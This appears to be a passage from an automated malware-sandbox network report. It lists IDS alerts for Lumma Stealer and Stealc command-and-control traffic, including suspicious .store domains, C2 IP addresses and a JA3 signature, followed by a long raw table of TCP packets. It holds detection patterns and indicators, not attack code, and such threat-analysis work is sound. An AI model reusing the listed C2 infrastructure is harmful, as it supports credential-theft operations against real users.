2024-11-07T07:34:17.465996+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	52992	1.1.1.1	53	UDP
2024-11-07T07:34:17.696946+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	62114	1.1.1.1	53	UDP
2024-11-07T07:34:18.870462+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50114	172.67.133.135	443	TCP
2024-11-07T07:34:18.870462+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50114	172.67.133.135	443	TCP
2024-11-07T07:34:19.569740+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50114	172.67.133.135	443	TCP
2024-11-07T07:34:19.569740+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50114	172.67.133.135	443	TCP
2024-11-07T07:34:23.112938+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50115	172.67.133.135	443	TCP
2024-11-07T07:34:23.112938+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50115	172.67.133.135	443	TCP
2024-11-07T07:34:24.022730+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50115	172.67.133.135	443	TCP
2024-11-07T07:34:24.022730+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50115	172.67.133.135	443	TCP
2024-11-07T07:34:29.633238+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50116	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 07:32:13.641419888 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:13.641477108 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:13.641546011 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:13.643615961 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:13.643631935 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:14.405755997 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:14.405922890 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:14.407907963 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:14.407918930 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:14.408149958 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:14.463005066 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:15.091237068 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:15.135329962 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.341898918 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.341919899 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.341928005 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.341948986 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.341958046 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.341973066 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.341981888 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:15.342005014 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.342021942 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:15.342056036 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:15.346224070 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.346285105 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:15.346290112 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.346299887 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:15.346353054 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:15.969079971 CET	49730	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:15.969108105 CET	443	49730	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:52.467201948 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:52.467242002 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:52.467308998 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:52.467763901 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:52.467776060 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.227977037 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.228039026 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.232610941 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.232618093 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.232814074 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.240844965 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.283343077 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.493444920 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.493463039 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.493506908 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.493530989 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.493545055 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.493556976 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.493590117 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.496072054 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.496108055 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.496129036 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.496136904 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.496145964 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.496165991 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.496187925 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.498296976 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.498308897 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:53.498331070 CET	49736	443	192.168.2.4	172.202.163.200
Nov 7, 2024 07:32:53.498336077 CET	443	49736	172.202.163.200	192.168.2.4
Nov 7, 2024 07:32:57.022382975 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:57.022424936 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:57.022497892 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:57.022747040 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:57.022764921 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:57.766268969 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:57.766347885 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:57.768136978 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:57.768155098 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:57.768412113 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:57.775367022 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:57.823334932 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.075622082 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.075644016 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.075658083 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.075728893 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.075762987 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.075809002 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.078166008 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.078183889 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.078243017 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.078250885 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.078288078 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.122796059 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.122811079 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.122879028 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.122888088 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.122922897 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.138189077 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.138202906 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.138257027 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.138264894 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.138298988 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.141545057 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.141565084 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.141611099 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.141618013 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.141654968 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.252276897 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.252293110 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.252372980 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.252389908 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.252425909 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.254813910 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.254827976 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.254873991 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.254883051 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.254918098 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.257579088 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.257594109 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.257656097 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.257663965 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.257699966 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.356261969 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.356277943 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.356385946 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.356412888 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.356453896 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.371586084 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.371603966 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.371643066 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.371653080 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.371665001 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.371675968 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.374373913 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.374393940 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.374442101 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.374449015 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.374475956 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.374486923 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.472549915 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.472565889 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.472615004 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.472632885 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.472672939 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.488259077 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.488274097 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.488322973 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.488333941 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.488370895 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.489732981 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.489787102 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.489794970 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.489825010 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.489844084 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.489861965 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.489875078 CET	49737	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.489880085 CET	443	49737	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.532594919 CET	49738	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.532628059 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.532689095 CET	49738	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.534209967 CET	49738	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.534223080 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.534435034 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.534466982 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.534523010 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.534636974 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.534651041 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.535572052 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.535598040 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.535644054 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.535808086 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.535832882 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.535893917 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.535972118 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.535983086 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.536235094 CET	49742	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.536242008 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.536292076 CET	49742	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.536405087 CET	49742	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.536412001 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:58.536475897 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:58.536488056 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.251554966 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.253412962 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.254163980 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.254185915 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.254273891 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.254300117 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.254689932 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.254693985 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.254741907 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.254746914 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.265290022 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.267225027 CET	49742	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.267231941 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.267606974 CET	49742	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.267611027 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.290210009 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.291232109 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.291249037 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.291666031 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.291671038 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.301563978 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.301958084 CET	49738	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.301976919 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.302237034 CET	49738	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.302241087 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.379374981 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.379395962 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.379543066 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.379550934 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.379587889 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.379664898 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.379681110 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.379692078 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.379697084 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.379720926 CET	49740	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.379729033 CET	443	49740	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.382191896 CET	49743	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.382215977 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.382755041 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.382781029 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.382831097 CET	49743	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.382855892 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.382879019 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.382941961 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.382956028 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.382957935 CET	49743	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.382966995 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.382983923 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.383059978 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.383074045 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.383085012 CET	49739	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.383090973 CET	443	49739	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.384902954 CET	49744	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.384923935 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.384984970 CET	49744	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.385104895 CET	49744	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.385117054 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.395289898 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.395508051 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.395582914 CET	49742	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.395824909 CET	49742	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.395824909 CET	49742	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.395831108 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.395838022 CET	443	49742	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.397475958 CET	49745	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.397495031 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.397576094 CET	49745	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.397690058 CET	49745	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.397701025 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.422502041 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.422519922 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.422555923 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.422688961 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.422688961 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.422766924 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.422772884 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.422782898 CET	49741	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.422785997 CET	443	49741	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.424740076 CET	49746	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.424751997 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.424833059 CET	49746	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.424956083 CET	49746	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.424968958 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.438221931 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.438262939 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.438386917 CET	49738	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.438555956 CET	49738	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.438555956 CET	49738	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.438564062 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.438570976 CET	443	49738	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.440109968 CET	49747	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.440118074 CET	443	49747	13.107.246.45	192.168.2.4
Nov 7, 2024 07:32:59.440176964 CET	49747	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.440279961 CET	49747	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:32:59.440289021 CET	443	49747	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.114923000 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.115045071 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.116558075 CET	49743	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.116569996 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.117254972 CET	49743	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.117260933 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.117784977 CET	49744	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.117814064 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.118278980 CET	49744	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.118283987 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.142317057 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.144753933 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.169905901 CET	443	49747	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.188136101 CET	49745	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.188146114 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.188582897 CET	49745	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.188586950 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.188802958 CET	49746	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.188843966 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.189157963 CET	49746	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.189162970 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.189672947 CET	49747	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.189678907 CET	443	49747	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.190032005 CET	49747	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.190036058 CET	443	49747	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.244412899 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.244465113 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.244512081 CET	49744	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.244823933 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.245186090 CET	49744	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.245196104 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.245202065 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.245210886 CET	49744	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.245215893 CET	443	49744	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.245238066 CET	49743	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.259398937 CET	49743	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.259409904 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.259443045 CET	49743	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.259448051 CET	443	49743	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.299055099 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.299072981 CET	443	49748	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.299143076 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.302783966 CET	49748	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.302794933 CET	443	49748	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.315222025 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.315720081 CET	443	49745	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.315752029 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.315781116 CET	49745	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.316196918 CET	443	49746	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:00.316241980 CET	49746	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:00.317011118 CET	49745	443	192.168.2.4	13.107.246.45
